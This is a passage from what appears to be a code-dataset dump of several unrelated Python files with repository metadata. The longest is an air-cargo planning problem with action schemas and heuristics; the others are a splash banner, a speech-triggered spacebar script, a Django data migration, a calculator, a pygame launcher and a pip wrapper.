            list of Action objects
        """
        # TODO create concrete Action objects based on the domain action schema for: Load, Unload, and Fly
        # concrete actions definition: specific literal action that does not include variables as with the schema
        # for example, the action schema 'Load(c, p, a)' can represent the concrete actions 'Load(C1, P1, SFO)'
        # or 'Load(C2, P2, JFK)'. The actions for the planning problem must be concrete because the problems in
        # forward search and Planning Graphs must use Propositional Logic

        def load_actions():
            """Create all concrete Load actions and return a list

            :return: list of Action objects
            """
            loads = []
            # Load(c, p, a): requires cargo and plane at the same airport;
            # moves the cargo from the airport into the plane.
            for c in self.cargos:
                for p in self.planes:
                    for a in self.airports:
                        precond_pos = [expr("At({}, {})".format(c, a)),
                                       expr("At({}, {})".format(p, a)),
                                       ]
                        precond_neg = []
                        effect_add = [expr("In({}, {})".format(c, p))]
                        effect_rem = [expr("At({}, {})".format(c, a))]
                        load = Action(expr("Load({}, {}, {})".format(c, p, a)),
                                      [precond_pos, precond_neg],
                                      [effect_add, effect_rem])
                        loads.append(load)
            return loads

        def unload_actions():
            """Create all concrete Unload actions and return a list

            :return: list of Action objects
            """
            unloads = []
            # Unload(c, p, a): inverse of Load -- cargo leaves the plane and
            # is placed at the plane's current airport.
            for c in self.cargos:
                for p in self.planes:
                    for a in self.airports:
                        precond_pos = [expr("In({}, {})".format(c, p)),
                                       expr("At({}, {})".format(p, a)),
                                       ]
                        precond_neg = []
                        effect_add = [expr("At({}, {})".format(c, a))]
                        effect_rem = [expr("In({}, {})".format(c, p))]
                        unload = Action(expr("Unload({}, {}, {})".format(c, p, a)),
                                        [precond_pos, precond_neg],
                                        [effect_add, effect_rem])
                        unloads.append(unload)
            return unloads

        def fly_actions():
            """Create all concrete Fly actions and return a list

            :return: list of Action objects
            """
            flys = []
            # Fly(p, fr, to): plane moves between two distinct airports.
            for fr in self.airports:
                for to in self.airports:
                    if fr != to:
                        for p in self.planes:
                            precond_pos = [expr("At({}, {})".format(p, fr)),
                                           ]
                            precond_neg = []
                            effect_add = [expr("At({}, {})".format(p, to))]
                            effect_rem = [expr("At({}, {})".format(p, fr))]
                            fly = Action(expr("Fly({}, {}, {})".format(p, fr, to)),
                                         [precond_pos, precond_neg],
                                         [effect_add, effect_rem])
                            flys.append(fly)
            return flys

        return load_actions() + unload_actions() + fly_actions()

    def actions(self, state: str) -> list:
        """ Return the actions that can be executed in the given state.

        :param state: str
            state represented as T/F string of mapped fluents (state variables)
            e.g. 'FTTTFF'
        :return: list of Action objects
        """
        # An action is applicable when all positive preconditions hold in the
        # KB and no negative precondition does.
        possible_actions = []
        kb = PropKB()
        kb.tell(decode_state(state, self.state_map).pos_sentence())
        for action in self.actions_list:
            valid_pos = all([pc in kb.clauses for pc in action.precond_pos])
            valid_neg = all([pc not in kb.clauses for pc in action.precond_neg])
            if valid_pos and valid_neg: possible_actions.append(action)
        return possible_actions

    def result(self, state: str, action: Action):
        """ Return the state that results from executing the given
        action in the given state. The action must be one of
        self.actions(state).

        :param state: state entering node
        :param action: Action applied
        :return: resulting state after action
        """
        # TODO implement
        # Apply the action's add/delete lists to the decoded fluent sets,
        # then re-encode against the fixed state_map ordering.
        new_state = FluentState([], [])
        old_state = decode_state(state, self.state_map)
        new_state.pos.extend(f for f in old_state.pos if f not in action.effect_rem)
        new_state.pos.extend(f for f in action.effect_add if f not in new_state.pos)
        new_state.neg.extend(f for f in old_state.neg if f not in action.effect_add)
        new_state.neg.extend(f for f in action.effect_rem if f not in new_state.neg)
        return encode_state(new_state, self.state_map)

    def goal_test(self, state: str) -> bool:
        """ Test the state to see if goal is reached

        :param state: str representing state
        :return: bool
        """
        # Every goal literal must be entailed by the positive fluents.
        kb = PropKB()
        kb.tell(decode_state(state, self.state_map).pos_sentence())
        for clause in self.goal:
            if clause not in kb.clauses:
                return False
        return True

    def h_1(self, node: Node):
        """Trivial heuristic: constant 1 for every node (uninformed baseline)."""
        # note that this is not a true heuristic
        h_const = 1
        return h_const

    # NOTE(review): lru_cache on instance methods keys on `self` and keeps
    # instances (and Node arguments) alive for the cache's lifetime -- accepted
    # here for the course project, but worth confirming for long-lived use.
    @lru_cache(maxsize=8192)
    def h_pg_levelsum(self, node: Node):
        """This heuristic uses a planning graph representation of the problem
        state space to estimate the sum of all actions that must be carried
        out from the current state in order to satisfy each individual goal
        condition.
        """
        # requires implemented PlanningGraph class
        pg = PlanningGraph(self, node.state)
        pg_levelsum = pg.h_levelsum()
        return pg_levelsum

    @lru_cache(maxsize=8192)
    def h_ignore_preconditions(self, node: Node):
        """This heuristic estimates the minimum number of actions that must be
        carried out from the current state in order to satisfy all of the goal
        conditions by ignoring the preconditions required for an action to be
        executed.
        """
        # TODO implement (see Russell-Norvig Ed-3 10.2.3 or Russell-Norvig Ed-2 11.2)
        # Greedy set-cover: repeatedly pick the action whose add-effects cover
        # the most remaining goals.
        count = 0
        goals = set(self.goal)
        actions = self.actions_list[:]
        while (goals):
            next_node = max(actions, key=lambda x: len([eff for eff in x.effect_add if eff in goals]))
            actions.remove(next_node)
            goals = goals - set(next_node.effect_add)
            count += 1
        return count
def air_cargo_p1() -> AirCargoProblem:
    """Problem 1: two cargos, two planes, two airports.

    Goal: C1 at JFK and C2 at SFO.
    """
    cargos = ['C1', 'C2']
    planes = ['P1', 'P2']
    airports = ['JFK', 'SFO']
    # Positive fluents: initial locations of every cargo and plane.
    pos = [expr(literal) for literal in ('At(C1, SFO)',
                                         'At(C2, JFK)',
                                         'At(P1, SFO)',
                                         'At(P2, JFK)')]
    # Negative fluents: all remaining location/containment literals.
    neg = [expr(literal) for literal in ('At(C2, SFO)',
                                         'In(C2, P1)',
                                         'In(C2, P2)',
                                         'At(C1, JFK)',
                                         'In(C1, P1)',
                                         'In(C1, P2)',
                                         'At(P1, JFK)',
                                         'At(P2, SFO)')]
    goal = [expr(literal) for literal in ('At(C1, JFK)', 'At(C2, SFO)')]
    return AirCargoProblem(cargos, planes, airports, FluentState(pos, neg), goal)
def air_cargo_p2() -> AirCargoProblem:
    """Problem 2: three cargos, three planes, three airports.

    Goal: C1 at JFK, C2 at SFO, C3 at SFO.
    """
    cargos = ['C1', 'C2', 'C3']
    planes = ['P1', 'P2', 'P3']
    airports = ['JFK', 'SFO', 'ATL']
    # Positive fluents: initial locations of every cargo and plane.
    pos = [expr(literal) for literal in ('At(C1, SFO)',
                                         'At(C2, JFK)',
                                         'At(C3, ATL)',
                                         'At(P1, SFO)',
                                         'At(P2, JFK)',
                                         'At(P3, ATL)')]
    # Negative fluents: all remaining location/containment literals.
    neg = [expr(literal) for literal in ('At(C1, JFK)',
                                         'At(C1, ATL)',
                                         'In(C1, P1)',
                                         'In(C1, P2)',
                                         'In(C1, P3)',
                                         'At(C2, SFO)',
                                         'At(C2, ATL)',
                                         'In(C2, P1)',
                                         'In(C2, P2)',
                                         'In(C2, P3)',
                                         'At(C3, SFO)',
                                         'At(C3, JFK)',
                                         'In(C3, P1)',
                                         'In(C3, P2)',
                                         'In(C3, P3)',
                                         'At(P1, JFK)',
                                         'At(P1, ATL)',
                                         'At(P2, SFO)',
                                         'At(P2, ATL)',
                                         'At(P3, SFO)',
                                         'At(P3, JFK)')]
    goal = [expr(literal) for literal in ('At(C1, JFK)',
                                          'At(C2, SFO)',
                                          'At(C3, SFO)')]
    return AirCargoProblem(cargos, planes, airports, FluentState(pos, neg), goal)
def air_cargo_p3() -> AirCargoProblem:
    """Problem 3: four cargos, two planes, four airports.

    Goal: C1 and C3 at JFK, C2 and C4 at SFO.

    Each cargo's negative fluents must list every airport it is NOT at plus
    every plane it is not in, so the encoded state map covers all reachable
    literals.
    """
    cargos = ['C1', 'C2', 'C3', 'C4']
    planes = ['P1', 'P2']
    airports = ['JFK', 'SFO', 'ATL', 'ORD']
    pos = [expr('At(C1, SFO)'),
           expr('At(C2, JFK)'),
           expr('At(C3, ATL)'),
           expr('At(C4, ORD)'),
           expr('At(P1, SFO)'),
           expr('At(P2, JFK)'),
           ]
    neg = [expr('At(C1, JFK)'),
           expr('At(C1, ATL)'),
           expr('At(C1, ORD)'),
           expr('In(C1, P1)'),
           expr('In(C1, P2)'),
           expr('At(C2, SFO)'),
           expr('At(C2, ATL)'),
           # BUGFIX: was a duplicate expr('At(C2, ATL)'); C2 starts at JFK, so
           # the missing literal is At(C2, ORD) -- without it the state map
           # lacks a fluent that Unload(C2, p, ORD) can produce.
           expr('At(C2, ORD)'),
           expr('In(C2, P1)'),
           expr('In(C2, P2)'),
           expr('At(C3, SFO)'),
           expr('At(C3, JFK)'),
           expr('At(C3, ORD)'),
           expr('In(C3, P1)'),
           expr('In(C3, P2)'),
           expr('At(C4, SFO)'),
           expr('At(C4, JFK)'),
           expr('At(C4, ATL)'),
           expr('In(C4, P1)'),
           expr('In(C4, P2)'),
           expr('At(P1, JFK)'),
           expr('At(P1, ATL)'),
           expr('At(P1, ORD)'),
           expr('At(P2, SFO)'),
           expr('At(P2, ATL)'),
           expr('At(P2, ORD)'),
           ]
    init = FluentState(pos, neg)
    goal = [expr('At(C1, JFK)'),
            expr('At(C2, SFO)'),
            expr('At(C3, JFK)'),
            expr('At(C4, SFO)'),
            ]
    return AirCargoProblem(cargos, planes, airports, init, goal)
|
[
"noreply@github.com"
] |
ExtremeGenerationIT.noreply@github.com
|
93fdfd28e2583d1f9ebae34e83d4595222d66227
|
d09b20bfd71c82dd8c19201c2d84254e1ea9a3a7
|
/iotpy/splashscreen.py
|
5fa9a38eb21799cbe14e449c9e329bf7fcbeb3b6
|
[
"MIT"
] |
permissive
|
panManfredini/IOTpy
|
a5790a54ecfcf856feb6be95a41fb9c32eb60fda
|
dbe382d37035b4bd66d76333bf1dcf800af76a43
|
refs/heads/main
| 2023-05-17T17:45:33.263396
| 2021-06-10T09:26:28
| 2021-06-10T09:26:28
| 305,758,389
| 0
| 0
| null | 2020-10-28T18:33:55
| 2020-10-20T15:49:35
|
Python
|
UTF-8
|
Python
| false
| false
| 570
|
py
|
splashscreen = """\n\n
*****************************************
* *
* *
* IOTpy *
* Version 0.3.2 *
* *
*****************************************
"""
def printSplashScreen():
    """Write the IOTpy startup banner to stdout."""
    banner = splashscreen
    print(banner)
|
[
"pan.manfredini@gmail.com"
] |
pan.manfredini@gmail.com
|
64d4abdb227b51cbc78882cd5754188c72f80b1e
|
9e0659a9c8417d64355d428583c81073548517ac
|
/Voice-Recognition/voice.py
|
8fa1d45660f562527f867c3eca67005b65cccab8
|
[] |
no_license
|
errpv78/Scene-Depiction
|
1304550efcd4b6db32c839cc0ff58745056cb694
|
078392901cf9c051116026dcfd905c50a7cceeb8
|
refs/heads/master
| 2023-01-08T07:32:13.924760
| 2020-11-17T04:40:29
| 2020-11-17T04:40:29
| 288,084,310
| 1
| 0
| null | 2020-11-02T10:34:53
| 2020-08-17T04:37:24
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 415
|
py
|
# Using SpeechRecognition
# One-shot voice trigger: listen on the default microphone, print what Google
# Speech Recognition heard, and simulate a spacebar press (e.g. to advance the
# scene-depiction app).  Requires the third-party `pynput` and
# `SpeechRecognition` packages and a working microphone.
from pynput.keyboard import Key, Controller
import speech_recognition as sr
r = sr.Recognizer()
keyboard = Controller()
# r.recognize_google()
mic = sr.Microphone()
# Block until a single phrase is captured from the microphone.
with mic as source:
    audio = r.listen(source)
try:
    query = r.recognize_google(audio)
    print(query)
    # Tap the spacebar once per recognized phrase.
    keyboard.press(Key.space)
    keyboard.release(Key.space)
except Exception as e:
    # NOTE(review): broad catch-all; recognition failures (UnknownValueError,
    # RequestError) are silently reported as 'Nothing' -- confirm intended.
    print('Nothing')
    pass
|
[
"parikhgoyal13@gmail.com"
] |
parikhgoyal13@gmail.com
|
87158830bce904828ce8e203db90dabce46c3f4c
|
248190817aaf1cc2c0bfc5a1344130c7027e86ce
|
/src/loyers/migrations/0006_auto_20160710_0721.py
|
ac86e849622f3c7a4cdfb97dbb868f012a223ace
|
[] |
no_license
|
ouhouhsami/loyer-api
|
9ec99e3506c766c99e3ec49f78509bf223b9ad9b
|
3345308f4c005ce2dd97e4264317ab44aaa8257b
|
refs/heads/master
| 2020-04-06T06:58:24.078949
| 2016-09-02T10:37:37
| 2016-09-02T10:37:37
| 63,017,827
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,309
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-10 07:21
from __future__ import unicode_literals
from django.db import migrations
def transfer(apps, schema_editor):
    """Data migration forward function.

    For every Loyer row:
    1. normalises empty-string numeric fields to ``None`` (NULL), and
    2. replaces free-text attributes with links to freshly created lookup
       rows (Observatory, Agglomeration, ..., ProductionMethodology).

    BUGFIX: the original compared strings with ``is ''`` / ``is not ''``,
    which tests object identity and only works by accident of CPython string
    interning (and raises SyntaxWarning on modern Python).  Equality
    comparison (``== ''`` / ``!= ''``) is used instead; the redundant second
    ``nombre_logements`` check was also dropped.
    """
    Loyer = apps.get_model("loyers", "Loyer")
    Observatory = apps.get_model("loyers", "Observatory")
    Agglomeration = apps.get_model("loyers", "Agglomeration")
    AgglomerationDescription = apps.get_model("loyers", "AgglomerationDescription")
    HousingType = apps.get_model("loyers", "HousingType")
    ConstructionPeriod = apps.get_model("loyers", "ConstructionPeriod")
    RenterSeniority = apps.get_model("loyers", "RenterSeniority")
    NumberOfRooms = apps.get_model("loyers", "NumberOfRooms")
    ProductionMethodology = apps.get_model("loyers", "ProductionMethodology")
    loyers = Loyer.objects.all()
    for loyer in loyers:
        # fix err data type conversion: empty strings become NULL
        if loyer.nombre_logements == '':
            loyer.nombre_logements = None
        if loyer.loyer_mensuel_1_decile == '':
            loyer.loyer_mensuel_1_decile = None
        if loyer.loyer_mensuel_1_quartile == '':
            loyer.loyer_mensuel_1_quartile = None
        if loyer.loyer_mensuel_median == '':
            loyer.loyer_mensuel_median = None
        if loyer.loyer_mensuel_3_quartile == '':
            loyer.loyer_mensuel_3_quartile = None
        if loyer.loyer_mensuel_9_decile == '':
            loyer.loyer_mensuel_9_decile = None
        if loyer.moyenne_loyer_mensuel == '':
            loyer.moyenne_loyer_mensuel = None
        if loyer.surface_moyenne == '':
            loyer.surface_moyenne = None
        if loyer.nombre_obsservations == '':
            loyer.nombre_obsservations = None
        if loyer.loyer_1_decile == '':
            loyer.loyer_1_decile = None
        if loyer.loyer_1_quartile == '':
            loyer.loyer_1_quartile = None
        if loyer.loyer_median == '':
            loyer.loyer_median = None
        if loyer.loyer_3_quartile == '':
            loyer.loyer_3_quartile = None
        if loyer.loyer_9_decile == '':
            loyer.loyer_9_decile = None
        if loyer.loyer_moyen == '':
            loyer.loyer_moyen = None
        # create fk: non-empty free-text values become lookup-table rows
        if loyer.Observatory != '':
            observatory, created = Observatory.objects.get_or_create(name=loyer.Observatory)
            loyer.observatory_link = observatory
        if loyer.agglomeration != '':
            agglomeration, created = Agglomeration.objects.get_or_create(name=loyer.agglomeration)
            loyer.agglomeration_link = agglomeration
        if loyer.Zone_complementaire != '':
            agglomeration_description, created = AgglomerationDescription.objects.get_or_create(name=loyer.Zone_complementaire)
            loyer.agglomeration_description_link = agglomeration_description
        if loyer.Type_habitat != '':
            housing_type, created = HousingType.objects.get_or_create(name=loyer.Type_habitat)
            loyer.housing_type_link = housing_type
        if loyer.epoque_construction_homogene != '':
            construction_period, created = ConstructionPeriod.objects.get_or_create(name=loyer.epoque_construction_homogene)
            loyer.construction_period_link = construction_period
        if loyer.anciennete_locataire_homogene != '':
            renter_seniority, created = RenterSeniority.objects.get_or_create(name=loyer.anciennete_locataire_homogene)
            loyer.renter_seniority_link = renter_seniority
        if loyer.nombre_pieces_homogene != '':
            number_of_rooms, created = NumberOfRooms.objects.get_or_create(name=loyer.nombre_pieces_homogene)
            loyer.number_of_rooms_link = number_of_rooms
        if loyer.methodologie_production != '':
            production_methodology, created = ProductionMethodology.objects.get_or_create(name=loyer.methodologie_production)
            loyer.production_methodology_link = production_methodology
        loyer.save()
def reverse_func(apps, schema_editor):
    """Reverse migration: intentionally a no-op (the link fields are simply
    left in place when rolling back)."""
    pass
class Migration(migrations.Migration):
    """Runs the `transfer` data migration after the schema changes in 0005."""

    dependencies = [
        ('loyers', '0005_auto_20160710_0720'),
    ]

    operations = [
        migrations.RunPython(transfer, reverse_func),
    ]
|
[
"samuel.goldszmidt@gmail.com"
] |
samuel.goldszmidt@gmail.com
|
c9df50cdb48d32427e35b390bad7889adff5d66c
|
d8e9b245973bd742d0c25e4cae76c7b0a9640ebe
|
/calc1.py
|
6adddb78ef7b2784e0f020f1178cea6be1147db7
|
[] |
no_license
|
Vikas1233321/Project1
|
245c851540a5ce51db82709a04e1aaf12a46b127
|
af9bcf78138c0d354cc6faba2ccc43b091209bec
|
refs/heads/master
| 2021-03-03T16:27:18.834633
| 2020-03-09T11:23:23
| 2020-03-09T11:23:23
| 245,973,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
def add(x, y):
    """Return the sum of x and y.

    BUGFIX: the body was a `pass` stub that returned None despite the
    docstring declaring an add function.
    """
    return x + y
def subtract(x, y):
    """Return the difference x - y."""
    difference = x - y
    return difference
|
[
"vi12@in.ibm.com"
] |
vi12@in.ibm.com
|
1d2ef80120f2a20c97ea62068f073c5fff3be405
|
00e1beb7980b2e9246433f7304a30624290a1670
|
/mediumlevel.py
|
e5ba3fc6a3f34acc6169d04cd43b68703e2965db
|
[] |
no_license
|
brettmcdowell/SimpleGame
|
13da4ad23a75d55a9889f7c43e5483d563068c7b
|
2d6d997d951a83a6abd929a7ffdd9548e90f6f00
|
refs/heads/main
| 2023-01-14T17:38:32.074649
| 2020-11-18T09:43:40
| 2020-11-18T09:43:40
| 312,881,813
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
import sys
import pygame
from player import Human_Player
from screen import Screen
from game import Game, HardGame
from main import play_game
if __name__ == "__main__":
pygame.init()
screen = Screen()
player = Human_Player(screen.width/2, screen.height-100)
game = HardGame(max_enemies=15)
play_game(screen, player, game)
|
[
"noreply@github.com"
] |
brettmcdowell.noreply@github.com
|
a80c321de193ab741a4881d2d2c49543455c03b1
|
1d30f51c4434d7ba90387d9caf838e590d87c991
|
/venv/bin/pip3
|
0339d8bfbd540e3888efe5a7b4fbbacee9a00ecc
|
[] |
no_license
|
eewig/parsing_zno
|
ce035be7c36c3670ce9d4ed715cc82e7fe6cfa24
|
c1bbff87bac6292905e909fdc174ee4e5a4ce1ab
|
refs/heads/master
| 2022-02-14T10:51:14.868560
| 2019-07-30T17:45:06
| 2019-07-30T17:45:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
#!/home/alex/PycharmProjects/parsing_zno/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
# NOTE(review): auto-generated setuptools console-script wrapper for pip;
# regenerated on install -- do not edit by hand.
__requires__ = 'pip==19.0.3'
import re
import sys

from pkg_resources import load_entry_point

if __name__ == '__main__':
    # Strip the '-script.py'/'.exe' suffix so pip sees a clean program name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
    )
|
[
"alosha.alosh@ukr.net"
] |
alosha.alosh@ukr.net
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.